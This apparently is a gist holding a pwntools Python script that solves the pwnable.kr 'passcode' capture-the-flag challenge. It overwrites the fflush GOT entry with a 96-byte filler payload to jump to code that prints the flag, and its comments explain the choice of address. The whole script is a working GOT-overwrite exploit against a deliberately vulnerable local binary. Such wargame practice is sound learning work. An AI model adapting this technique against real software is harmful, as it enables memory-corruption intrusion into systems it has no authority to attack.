@hxer
Created November 10, 2017 08:47
pwnable.kr passcode exploit, debug with local env
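# -*- coding: utf-8 -*-
from pwn import *

context.arch = 'i386'
context.word_size = 32
context.log_level = 'debug'

exe = './passcode'
elf = ELF(exe)

# printf's GOT entry is 0x804a00c. The address contains the byte 0x0c, which
# makes scanf truncate the input, so this address cannot be used.
printf_got = elf.got['printf']
print("printf got address is: {}".format(hex(printf_got)))

# Use fflush's GOT entry instead.
fflush_got = elf.got['fflush']

# Address of the code in the binary that runs system("/bin/cat flag")
call_addr = 0x804862d

# First line: 96 filler bytes followed by the fflush GOT address.
# Second line: call_addr as a decimal string.
# Byte strings keep the payload working on both Python 2 and Python 3.
payload = b'1' * 96 + p32(fflush_got) + b'\n' + str(call_addr).encode() + b'\n'
print("payload is : {!r}".format(payload))

io = process(exe)
io.send(payload)
# Read the program's four lines of output
io.recvline()
io.recvline()
io.recvline()
io.recvline()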